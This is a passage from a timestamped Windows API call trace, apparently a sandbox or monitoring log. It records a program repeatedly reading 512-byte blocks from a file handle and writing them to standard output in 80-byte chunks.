lpNumberOfBytesWritten=0x26dd8c, lpOverlapped=0x0 | out: lpBuffer=0x26ec48*, lpNumberOfBytesWritten=0x26dd8c*=0x50, lpOverlapped=0x0) returned 1 [0220.227] _get_osfhandle (_FileHandle=1) returned 0x4c [0220.227] GetFileType (hFile=0x4c) returned 0x1 [0220.227] _get_osfhandle (_FileHandle=1) returned 0x4c [0220.227] WriteFile (in: hFile=0x4c, lpBuffer=0x26ec98*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dd8c, lpOverlapped=0x0 | out: lpBuffer=0x26ec98*, lpNumberOfBytesWritten=0x26dd8c*=0x50, lpOverlapped=0x0) returned 1 [0220.227] _get_osfhandle (_FileHandle=1) returned 0x4c [0220.227] GetFileType (hFile=0x4c) returned 0x1 [0220.227] _get_osfhandle (_FileHandle=1) returned 0x4c [0220.227] WriteFile (in: hFile=0x4c, lpBuffer=0x26ece8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dd8c, lpOverlapped=0x0 | out: lpBuffer=0x26ece8*, lpNumberOfBytesWritten=0x26dd8c*=0x50, lpOverlapped=0x0) returned 1 [0220.227] _get_osfhandle (_FileHandle=1) returned 0x4c [0220.227] GetFileType (hFile=0x4c) returned 0x1 [0220.227] _get_osfhandle (_FileHandle=1) returned 0x4c [0220.227] WriteFile (in: hFile=0x4c, lpBuffer=0x26ed38*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dd8c, lpOverlapped=0x0 | out: lpBuffer=0x26ed38*, lpNumberOfBytesWritten=0x26dd8c*=0x50, lpOverlapped=0x0) returned 1 [0220.227] _get_osfhandle (_FileHandle=1) returned 0x4c [0220.227] GetFileType (hFile=0x4c) returned 0x1 [0220.227] _get_osfhandle (_FileHandle=1) returned 0x4c [0220.227] WriteFile (in: hFile=0x4c, lpBuffer=0x26ed88*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x26dd8c, lpOverlapped=0x0 | out: lpBuffer=0x26ed88*, lpNumberOfBytesWritten=0x26dd8c*=0x20, lpOverlapped=0x0) returned 1 [0220.227] _get_osfhandle (_FileHandle=4) returned 0x54 [0220.227] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26dd78 | out: lpNewFilePointer=0x0) returned 1 [0220.227] _get_osfhandle (_FileHandle=4) returned 0x54 [0220.227] ReadFile (in: hFile=0x54, lpBuffer=0x26eba8, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dd98, lpOverlapped=0x0 | out: lpBuffer=0x26eba8*, lpNumberOfBytesRead=0x26dd98*=0x200, lpOverlapped=0x0) returned 1 [0220.227] _get_osfhandle (_FileHandle=1) returned 0x4c [0220.227] GetFileType (hFile=0x4c) returned 0x1 [0220.227] _get_osfhandle (_FileHandle=1) returned 0x4c [0220.227] GetFileType (hFile=0x4c) returned 0x1 [0220.227] _get_osfhandle (_FileHandle=1) returned 0x4c [0220.227] WriteFile (in: hFile=0x4c, lpBuffer=0x26eba8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dd8c, lpOverlapped=0x0 | out: lpBuffer=0x26eba8*, lpNumberOfBytesWritten=0x26dd8c*=0x50, lpOverlapped=0x0) returned 1 [0220.227] _get_osfhandle (_FileHandle=1) returned 0x4c [0220.228] GetFileType (hFile=0x4c) returned 0x1 [0220.228] _get_osfhandle (_FileHandle=1) returned 0x4c [0220.228] WriteFile (in: hFile=0x4c, lpBuffer=0x26ebf8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dd8c, lpOverlapped=0x0 | out: lpBuffer=0x26ebf8*, lpNumberOfBytesWritten=0x26dd8c*=0x50, lpOverlapped=0x0) returned 1 [0220.228] _get_osfhandle (_FileHandle=1) returned 0x4c [0220.228] GetFileType (hFile=0x4c) returned 0x1 [0220.228] _get_osfhandle (_FileHandle=1) returned 0x4c [0220.228] WriteFile (in: hFile=0x4c, lpBuffer=0x26ec48*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dd8c, lpOverlapped=0x0 | out: lpBuffer=0x26ec48*, lpNumberOfBytesWritten=0x26dd8c*=0x50, lpOverlapped=0x0) returned 1 [0220.228] _get_osfhandle (_FileHandle=1) returned 0x4c [0220.228] GetFileType (hFile=0x4c) returned 0x1 [0220.228] _get_osfhandle (_FileHandle=1) returned 0x4c [0220.228] WriteFile (in: hFile=0x4c, lpBuffer=0x26ec98*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dd8c, lpOverlapped=0x0 | out: lpBuffer=0x26ec98*, lpNumberOfBytesWritten=0x26dd8c*=0x50, lpOverlapped=0x0) returned 1 [0220.228] _get_osfhandle (_FileHandle=1) returned 0x4c [0220.228] GetFileType (hFile=0x4c) returned 0x1 [0220.228] _get_osfhandle (_FileHandle=1) returned 0x4c [0220.228] WriteFile (in: hFile=0x4c, lpBuffer=0x26ece8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dd8c, lpOverlapped=0x0 | out: lpBuffer=0x26ece8*, lpNumberOfBytesWritten=0x26dd8c*=0x50, lpOverlapped=0x0) returned 1 [0220.228] _get_osfhandle (_FileHandle=1) returned 0x4c [0220.228] GetFileType (hFile=0x4c) returned 0x1 [0220.228] _get_osfhandle (_FileHandle=1) returned 0x4c [0220.228] WriteFile (in: hFile=0x4c, lpBuffer=0x26ed38*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dd8c, lpOverlapped=0x0 | out: lpBuffer=0x26ed38*, lpNumberOfBytesWritten=0x26dd8c*=0x50, lpOverlapped=0x0) returned 1 [0220.228] _get_osfhandle (_FileHandle=1) returned 0x4c [0220.228] GetFileType (hFile=0x4c) returned 0x1 [0220.228] _get_osfhandle (_FileHandle=1) returned 0x4c [0220.228] WriteFile (in: hFile=0x4c, lpBuffer=0x26ed88*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x26dd8c, lpOverlapped=0x0 | out: lpBuffer=0x26ed88*, lpNumberOfBytesWritten=0x26dd8c*=0x20, lpOverlapped=0x0) returned 1 [0220.228] _get_osfhandle (_FileHandle=4) returned 0x54 [0220.228] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26dd78 | out: lpNewFilePointer=0x0) returned 1 [0220.228] _get_osfhandle (_FileHandle=4) returned 0x54 [0220.228] ReadFile (in: hFile=0x54, lpBuffer=0x26eba8, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dd98, lpOverlapped=0x0 | out: lpBuffer=0x26eba8*, lpNumberOfBytesRead=0x26dd98*=0x200, lpOverlapped=0x0) returned 1 [0220.228] _get_osfhandle (_FileHandle=1) returned 0x4c [0220.228] GetFileType (hFile=0x4c) returned 0x1 [0220.228] _get_osfhandle (_FileHandle=1) returned 0x4c [0220.228] GetFileType (hFile=0x4c) returned 0x1 [0220.228] _get_osfhandle (_FileHandle=1) returned 0x4c [0220.228] WriteFile (in: hFile=0x4c, lpBuffer=0x26eba8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dd8c, lpOverlapped=0x0 | out: lpBuffer=0x26eba8*, lpNumberOfBytesWritten=0x26dd8c*=0x50, lpOverlapped=0x0) returned 1 [0220.228] _get_osfhandle (_FileHandle=1) returned 0x4c [0220.229] GetFileType (hFile=0x4c) returned 0x1 [0220.229] _get_osfhandle (_FileHandle=1) returned 0x4c [0220.229] WriteFile (in: hFile=0x4c, lpBuffer=0x26ebf8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dd8c, lpOverlapped=0x0 | out: lpBuffer=0x26ebf8*, lpNumberOfBytesWritten=0x26dd8c*=0x50, lpOverlapped=0x0) returned 1 [0220.229] _get_osfhandle (_FileHandle=1) returned 0x4c [0220.229] GetFileType (hFile=0x4c) returned 0x1 [0220.229] _get_osfhandle (_FileHandle=1) returned 0x4c [0220.229] WriteFile (in: hFile=0x4c, lpBuffer=0x26ec48*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dd8c, lpOverlapped=0x0 | out: lpBuffer=0x26ec48*, lpNumberOfBytesWritten=0x26dd8c*=0x50, lpOverlapped=0x0) returned 1 [0220.229] _get_osfhandle (_FileHandle=1) returned 0x4c [0220.229] GetFileType (hFile=0x4c) returned 0x1 [0220.229] _get_osfhandle (_FileHandle=1) returned 0x4c [0220.229] WriteFile (in: hFile=0x4c, lpBuffer=0x26ec98*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dd8c, lpOverlapped=0x0 | out: lpBuffer=0x26ec98*, lpNumberOfBytesWritten=0x26dd8c*=0x50, lpOverlapped=0x0) returned 1 [0220.229] _get_osfhandle (_FileHandle=1) returned 0x4c [0220.229] GetFileType (hFile=0x4c) returned 0x1 [0220.229] _get_osfhandle (_FileHandle=1) returned 0x4c [0220.229] WriteFile (in: hFile=0x4c, lpBuffer=0x26ece8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dd8c, lpOverlapped=0x0 | out: lpBuffer=0x26ece8*, lpNumberOfBytesWritten=0x26dd8c*=0x50, lpOverlapped=0x0) returned 1 [0220.229] _get_osfhandle (_FileHandle=1) returned 0x4c [0220.229] GetFileType (hFile=0x4c) returned 0x1 [0220.229] _get_osfhandle (_FileHandle=1) returned 0x4c [0220.229] WriteFile (in: hFile=0x4c, lpBuffer=0x26ed38*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dd8c, lpOverlapped=0x0 | out: lpBuffer=0x26ed38*, lpNumberOfBytesWritten=0x26dd8c*=0x50, lpOverlapped=0x0) returned 1 [0220.229] _get_osfhandle (_FileHandle=1) returned 0x4c [0220.229] GetFileType (hFile=0x4c) returned 0x1 [0220.229] _get_osfhandle (_FileHandle=1) returned 0x4c [0220.229] WriteFile (in: hFile=0x4c, lpBuffer=0x26ed88*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x26dd8c, lpOverlapped=0x0 | out: lpBuffer=0x26ed88*, lpNumberOfBytesWritten=0x26dd8c*=0x20, lpOverlapped=0x0) returned 1 [0220.229] _get_osfhandle (_FileHandle=4) returned 0x54 [0220.229] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26dd78 | out: lpNewFilePointer=0x0) returned 1 [0220.229] _get_osfhandle (_FileHandle=4) returned 0x54 [0220.229] ReadFile (in: hFile=0x54, lpBuffer=0x26eba8, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dd98, lpOverlapped=0x0 | out: lpBuffer=0x26eba8*, lpNumberOfBytesRead=0x26dd98*=0x200, lpOverlapped=0x0) returned 1 [0220.229] _get_osfhandle (_FileHandle=1) returned 0x4c [0220.229] GetFileType (hFile=0x4c) returned 0x1 [0220.229] _get_osfhandle (_FileHandle=1) returned 0x4c [0220.229] GetFileType (hFile=0x4c) returned 0x1 [0220.229] _get_osfhandle (_FileHandle=1) returned 0x4c [0220.229] WriteFile (in: hFile=0x4c, lpBuffer=0x26eba8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dd8c, lpOverlapped=0x0 | out: lpBuffer=0x26eba8*, lpNumberOfBytesWritten=0x26dd8c*=0x50, lpOverlapped=0x0) returned 1 [0220.229] _get_osfhandle (_FileHandle=1) returned 0x4c [0220.230] GetFileType (hFile=0x4c) returned 0x1 [0220.230] _get_osfhandle (_FileHandle=1) returned 0x4c [0220.230] WriteFile (in: hFile=0x4c, lpBuffer=0x26ebf8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dd8c, lpOverlapped=0x0 | out: lpBuffer=0x26ebf8*, lpNumberOfBytesWritten=0x26dd8c*=0x50, lpOverlapped=0x0) returned 1 [0220.230] _get_osfhandle (_FileHandle=1) returned 0x4c [0220.230] GetFileType (hFile=0x4c) returned 0x1 [0220.230] _get_osfhandle (_FileHandle=1) returned 0x4c [0220.230] WriteFile (in: hFile=0x4c, lpBuffer=0x26ec48*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dd8c, lpOverlapped=0x0 | out: lpBuffer=0x26ec48*, lpNumberOfBytesWritten=0x26dd8c*=0x50, lpOverlapped=0x0) returned 1 [0220.230] _get_osfhandle (_FileHandle=1) returned 0x4c [0220.230] GetFileType (hFile=0x4c) returned 0x1 [0220.230] _get_osfhandle (_FileHandle=1) returned 0x4c [0220.230] WriteFile (in: hFile=0x4c, lpBuffer=0x26ec98*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dd8c, lpOverlapped=0x0 | out: lpBuffer=0x26ec98*, lpNumberOfBytesWritten=0x26dd8c*=0x50, lpOverlapped=0x0) returned 1 [0220.230] _get_osfhandle (_FileHandle=1) returned 0x4c [0220.230] GetFileType (hFile=0x4c) returned 0x1 [0220.230] _get_osfhandle (_FileHandle=1) returned 0x4c [0220.230] WriteFile (in: hFile=0x4c, lpBuffer=0x26ece8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dd8c, lpOverlapped=0x0 | out: lpBuffer=0x26ece8*, lpNumberOfBytesWritten=0x26dd8c*=0x50, lpOverlapped=0x0) returned 1 [0220.230] _get_osfhandle (_FileHandle=1) returned 0x4c [0220.230] GetFileType (hFile=0x4c) returned 0x1 [0220.230] _get_osfhandle (_FileHandle=1) returned 0x4c [0220.230] WriteFile (in: hFile=0x4c, lpBuffer=0x26ed38*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dd8c, lpOverlapped=0x0 | out: lpBuffer=0x26ed38*, lpNumberOfBytesWritten=0x26dd8c*=0x50, lpOverlapped=0x0) returned 1 [0220.230] _get_osfhandle (_FileHandle=1) returned 0x4c [0220.230] GetFileType (hFile=0x4c) returned 0x1 [0220.230] _get_osfhandle (_FileHandle=1) returned 0x4c [0220.230] WriteFile (in: hFile=0x4c, lpBuffer=0x26ed88*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x26dd8c, lpOverlapped=0x0 | out: lpBuffer=0x26ed88*, lpNumberOfBytesWritten=0x26dd8c*=0x20, lpOverlapped=0x0) returned 1 [0220.230] _get_osfhandle (_FileHandle=4) returned 0x54 [0220.230] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26dd78 | out: lpNewFilePointer=0x0) returned 1 [0220.230] _get_osfhandle (_FileHandle=4) returned 0x54 [0220.230] ReadFile (in: hFile=0x54, lpBuffer=0x26eba8, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dd98, lpOverlapped=0x0 | out: lpBuffer=0x26eba8*, lpNumberOfBytesRead=0x26dd98*=0x200, lpOverlapped=0x0) returned 1 [0220.230] _get_osfhandle (_FileHandle=1) returned 0x4c [0220.230] GetFileType (hFile=0x4c) returned 0x1 [0220.230] _get_osfhandle (_FileHandle=1) returned 0x4c [0220.230] GetFileType (hFile=0x4c) returned 0x1 [0220.230] _get_osfhandle (_FileHandle=1) returned 0x4c [0220.230] WriteFile (in: hFile=0x4c, lpBuffer=0x26eba8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dd8c, lpOverlapped=0x0 | out: lpBuffer=0x26eba8*, lpNumberOfBytesWritten=0x26dd8c*=0x50, lpOverlapped=0x0) returned 1 [0220.230] _get_osfhandle (_FileHandle=1) returned 0x4c [0220.231] GetFileType (hFile=0x4c) returned 0x1 [0220.231] _get_osfhandle (_FileHandle=1) returned 0x4c [0220.231] WriteFile (in: hFile=0x4c, lpBuffer=0x26ebf8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dd8c, lpOverlapped=0x0 | out: lpBuffer=0x26ebf8*, lpNumberOfBytesWritten=0x26dd8c*=0x50, lpOverlapped=0x0) returned 1 [0220.231] _get_osfhandle (_FileHandle=1) returned 0x4c [0220.231] GetFileType (hFile=0x4c) returned 0x1 [0220.231] _get_osfhandle (_FileHandle=1) returned 0x4c [0220.231] WriteFile (in: hFile=0x4c, lpBuffer=0x26ec48*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dd8c, lpOverlapped=0x0 | out: lpBuffer=0x26ec48*, lpNumberOfBytesWritten=0x26dd8c*=0x50, lpOverlapped=0x0) returned 1 [0220.231] _get_osfhandle (_FileHandle=1) returned 0x4c [0220.231] GetFileType (hFile=0x4c) returned 0x1 [0220.231] _get_osfhandle (_FileHandle=1) returned 0x4c [0220.231] WriteFile (in: hFile=0x4c, lpBuffer=0x26ec98*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dd8c, lpOverlapped=0x0 | out: lpBuffer=0x26ec98*, lpNumberOfBytesWritten=0x26dd8c*=0x50, lpOverlapped=0x0) returned 1 [0220.231] _get_osfhandle (_FileHandle=1) returned 0x4c [0220.231] GetFileType (hFile=0x4c) returned 0x1 [0220.231] _get_osfhandle (_FileHandle=1) returned 0x4c [0220.231] WriteFile (in: hFile=0x4c, lpBuffer=0x26ece8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dd8c, lpOverlapped=0x0 | out: lpBuffer=0x26ece8*, lpNumberOfBytesWritten=0x26dd8c*=0x50, lpOverlapped=0x0) returned 1 [0220.231] _get_osfhandle (_FileHandle=1) returned 0x4c [0220.231] GetFileType (hFile=0x4c) returned 0x1 [0220.231] _get_osfhandle (_FileHandle=1) returned 0x4c [0220.231] WriteFile (in: hFile=0x4c, lpBuffer=0x26ed38*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dd8c, lpOverlapped=0x0 | out: lpBuffer=0x26ed38*, lpNumberOfBytesWritten=0x26dd8c*=0x50, lpOverlapped=0x0) returned 1 [0220.231] _get_osfhandle (_FileHandle=1) returned 0x4c [0220.231] GetFileType (hFile=0x4c) returned 0x1 [0220.231] _get_osfhandle (_FileHandle=1) returned 0x4c [0220.231] WriteFile (in: hFile=0x4c, lpBuffer=0x26ed88*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x26dd8c, lpOverlapped=0x0 | out: lpBuffer=0x26ed88*, lpNumberOfBytesWritten=0x26dd8c*=0x20, lpOverlapped=0x0) returned 1 [0220.231] _get_osfhandle (_FileHandle=4) returned 0x54 [0220.231] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26dd78 | out: lpNewFilePointer=0x0) returned 1 [0220.231] _get_osfhandle (_FileHandle=4) returned 0x54 [0220.231] ReadFile (in: hFile=0x54, lpBuffer=0x26eba8, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dd98, lpOverlapped=0x0 | out: lpBuffer=0x26eba8*, lpNumberOfBytesRead=0x26dd98*=0x200, lpOverlapped=0x0) returned 1 [0220.231] _get_osfhandle (_FileHandle=1) returned 0x4c [0220.231] GetFileType (hFile=0x4c) returned 0x1 [0220.231] _get_osfhandle (_FileHandle=1) returned 0x4c [0220.231] GetFileType (hFile=0x4c) returned 0x1 [0220.231] _get_osfhandle (_FileHandle=1) returned 0x4c [0220.231] WriteFile (in: hFile=0x4c, lpBuffer=0x26eba8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dd8c, lpOverlapped=0x0 | out: lpBuffer=0x26eba8*, lpNumberOfBytesWritten=0x26dd8c*=0x50, lpOverlapped=0x0) returned 1 [0220.231] _get_osfhandle (_FileHandle=1) returned 0x4c [0220.232] GetFileType (hFile=0x4c) returned 0x1 [0220.232] _get_osfhandle (_FileHandle=1) returned 0x4c [0220.232] WriteFile (in: hFile=0x4c, lpBuffer=0x26ebf8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dd8c, lpOverlapped=0x0 | out: lpBuffer=0x26ebf8*, lpNumberOfBytesWritten=0x26dd8c*=0x50, lpOverlapped=0x0) returned 1 [0220.232] _get_osfhandle (_FileHandle=1) returned 0x4c [0220.232] GetFileType (hFile=0x4c) returned 0x1 [0220.232] _get_osfhandle (_FileHandle=1) returned 0x4c [0220.232] WriteFile (in: hFile=0x4c, lpBuffer=0x26ec48*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dd8c, lpOverlapped=0x0 | out: lpBuffer=0x26ec48*, lpNumberOfBytesWritten=0x26dd8c*=0x50, lpOverlapped=0x0) returned 1 [0220.232] _get_osfhandle (_FileHandle=1) returned 0x4c [0220.232] GetFileType (hFile=0x4c) returned 0x1 [0220.232] _get_osfhandle (_FileHandle=1) returned 0x4c [0220.232] WriteFile (in: hFile=0x4c, lpBuffer=0x26ec98*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dd8c, lpOverlapped=0x0 | out: lpBuffer=0x26ec98*, lpNumberOfBytesWritten=0x26dd8c*=0x50, lpOverlapped=0x0) returned 1 [0220.232] _get_osfhandle (_FileHandle=1) returned 0x4c [0220.232] GetFileType (hFile=0x4c) returned 0x1 [0220.232] _get_osfhandle (_FileHandle=1) returned 0x4c [0220.232] WriteFile (in: hFile=0x4c, lpBuffer=0x26ece8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dd8c, lpOverlapped=0x0 | out: lpBuffer=0x26ece8*, lpNumberOfBytesWritten=0x26dd8c*=0x50, lpOverlapped=0x0) returned 1 [0220.232] _get_osfhandle (_FileHandle=1) returned 0x4c [0220.232] GetFileType (hFile=0x4c) returned 0x1 [0220.232] _get_osfhandle (_FileHandle=1) returned 0x4c [0220.232] WriteFile (in: hFile=0x4c, lpBuffer=0x26ed38*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dd8c, lpOverlapped=0x0 | out: lpBuffer=0x26ed38*, lpNumberOfBytesWritten=0x26dd8c*=0x50, lpOverlapped=0x0) returned 1 [0220.232] _get_osfhandle (_FileHandle=1) returned 0x4c [0220.232] GetFileType (hFile=0x4c) returned 0x1 [0220.232] _get_osfhandle (_FileHandle=1) returned 0x4c [0220.232] WriteFile (in: hFile=0x4c, lpBuffer=0x26ed88*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x26dd8c, lpOverlapped=0x0 | out: lpBuffer=0x26ed88*, lpNumberOfBytesWritten=0x26dd8c*=0x20, lpOverlapped=0x0) returned 1 [0220.232] _get_osfhandle (_FileHandle=4) returned 0x54 [0220.232] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26dd78 | out: lpNewFilePointer=0x0) returned 1 [0220.232] _get_osfhandle (_FileHandle=4) returned 0x54 [0220.232] ReadFile (in: hFile=0x54, lpBuffer=0x26eba8, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dd98, lpOverlapped=0x0 | out: lpBuffer=0x26eba8*, lpNumberOfBytesRead=0x26dd98*=0x200, lpOverlapped=0x0) returned 1 [0220.232] _get_osfhandle (_FileHandle=1) returned 0x4c [0220.232] GetFileType (hFile=0x4c) returned 0x1 [0220.232] _get_osfhandle (_FileHandle=1) returned 0x4c [0220.232] GetFileType (hFile=0x4c) returned 0x1 [0220.232] _get_osfhandle (_FileHandle=1) returned 0x4c [0220.232] WriteFile (in: hFile=0x4c, lpBuffer=0x26eba8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dd8c, lpOverlapped=0x0 | out: lpBuffer=0x26eba8*, lpNumberOfBytesWritten=0x26dd8c*=0x50, lpOverlapped=0x0) returned 1 [0220.233] _get_osfhandle (_FileHandle=1) returned 0x4c [0220.233] GetFileType (hFile=0x4c) returned 0x1 [0220.233] _get_osfhandle (_FileHandle=1) returned 0x4c [0220.233] WriteFile (in: hFile=0x4c, lpBuffer=0x26ebf8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dd8c, lpOverlapped=0x0 | out: lpBuffer=0x26ebf8*, lpNumberOfBytesWritten=0x26dd8c*=0x50, lpOverlapped=0x0) returned 1 [0220.233] _get_osfhandle (_FileHandle=1) returned 0x4c [0220.233] GetFileType (hFile=0x4c) returned 0x1 [0220.233] _get_osfhandle (_FileHandle=1) returned 0x4c [0220.233] WriteFile (in: hFile=0x4c, lpBuffer=0x26ec48*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dd8c, lpOverlapped=0x0 | out: lpBuffer=0x26ec48*, lpNumberOfBytesWritten=0x26dd8c*=0x50, lpOverlapped=0x0) returned 1 [0220.233] _get_osfhandle (_FileHandle=1) returned 0x4c [0220.233] GetFileType (hFile=0x4c) returned 0x1 [0220.233] _get_osfhandle (_FileHandle=1) returned 0x4c [0220.233] WriteFile (in: hFile=0x4c, lpBuffer=0x26ec98*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dd8c, lpOverlapped=0x0 | out: lpBuffer=0x26ec98*, lpNumberOfBytesWritten=0x26dd8c*=0x50, lpOverlapped=0x0) returned 1 [0220.233] _get_osfhandle (_FileHandle=1) returned 0x4c [0220.233] GetFileType (hFile=0x4c) returned 0x1 [0220.233] _get_osfhandle (_FileHandle=1) returned 0x4c [0220.233] WriteFile (in: hFile=0x4c, lpBuffer=0x26ece8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dd8c, lpOverlapped=0x0 | out: lpBuffer=0x26ece8*, lpNumberOfBytesWritten=0x26dd8c*=0x50, lpOverlapped=0x0) returned 1 [0220.233] _get_osfhandle (_FileHandle=1) returned 0x4c [0220.233] GetFileType (hFile=0x4c) returned 0x1 [0220.233] _get_osfhandle (_FileHandle=1) returned 0x4c [0220.233] WriteFile (in: hFile=0x4c, lpBuffer=0x26ed38*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dd8c, lpOverlapped=0x0 | out: lpBuffer=0x26ed38*, lpNumberOfBytesWritten=0x26dd8c*=0x50, lpOverlapped=0x0) returned 1 [0220.233] _get_osfhandle (_FileHandle=1) returned 0x4c [0220.233] GetFileType (hFile=0x4c) returned 0x1 [0220.233] _get_osfhandle (_FileHandle=1) returned 0x4c [0220.233] WriteFile (in: hFile=0x4c, lpBuffer=0x26ed88*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x26dd8c, lpOverlapped=0x0 | out: lpBuffer=0x26ed88*, lpNumberOfBytesWritten=0x26dd8c*=0x20, lpOverlapped=0x0) returned 1 [0220.233] _get_osfhandle (_FileHandle=4) returned 0x54 [0220.233] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26dd78 | out: lpNewFilePointer=0x0) returned 1 [0220.233] _get_osfhandle (_FileHandle=4) returned 0x54 [0220.233] ReadFile (in: hFile=0x54, lpBuffer=0x26eba8, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dd98, lpOverlapped=0x0 | out: lpBuffer=0x26eba8*, lpNumberOfBytesRead=0x26dd98*=0x200, lpOverlapped=0x0) returned 1 [0220.233] _get_osfhandle (_FileHandle=1) returned 0x4c [0220.233] GetFileType (hFile=0x4c) returned 0x1 [0220.233] _get_osfhandle (_FileHandle=1) returned 0x4c [0220.234] GetFileType (hFile=0x4c) returned 0x1 [0220.234] _get_osfhandle (_FileHandle=1) returned 0x4c [0220.234] WriteFile (in: hFile=0x4c, lpBuffer=0x26eba8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dd8c, lpOverlapped=0x0 | out: lpBuffer=0x26eba8*, lpNumberOfBytesWritten=0x26dd8c*=0x50, lpOverlapped=0x0) returned 1 [0220.234] _get_osfhandle (_FileHandle=1) returned 0x4c [0220.234] GetFileType (hFile=0x4c) returned 0x1 [0220.234] _get_osfhandle (_FileHandle=1) returned 0x4c [0220.234] WriteFile (in: hFile=0x4c, lpBuffer=0x26ebf8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dd8c, lpOverlapped=0x0 | out: lpBuffer=0x26ebf8*, lpNumberOfBytesWritten=0x26dd8c*=0x50, lpOverlapped=0x0) returned 1 [0220.234] _get_osfhandle (_FileHandle=1) returned 0x4c [0220.234] GetFileType (hFile=0x4c) returned 0x1 [0220.234] _get_osfhandle (_FileHandle=1) returned 0x4c [0220.234] WriteFile (in: hFile=0x4c, lpBuffer=0x26ec48*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dd8c, lpOverlapped=0x0 | out: lpBuffer=0x26ec48*, lpNumberOfBytesWritten=0x26dd8c*=0x50, lpOverlapped=0x0) returned 1 [0220.234] _get_osfhandle (_FileHandle=1) returned 0x4c [0220.234] GetFileType (hFile=0x4c) returned 0x1 [0220.234] _get_osfhandle (_FileHandle=1) returned 0x4c [0220.383] WriteFile (in: hFile=0x4c, lpBuffer=0x26ec98*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dd8c, lpOverlapped=0x0 | out: lpBuffer=0x26ec98*, lpNumberOfBytesWritten=0x26dd8c*=0x50, lpOverlapped=0x0) returned 1 [0220.383] _get_osfhandle (_FileHandle=1) returned 0x4c [0220.383] GetFileType (hFile=0x4c) returned 0x1 [0220.383] _get_osfhandle (_FileHandle=1) returned 0x4c [0220.383] WriteFile (in: hFile=0x4c, lpBuffer=0x26ece8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dd8c, lpOverlapped=0x0 | out: lpBuffer=0x26ece8*, lpNumberOfBytesWritten=0x26dd8c*=0x50, lpOverlapped=0x0) returned 1 [0220.383] _get_osfhandle (_FileHandle=1) returned 0x4c [0220.383] GetFileType 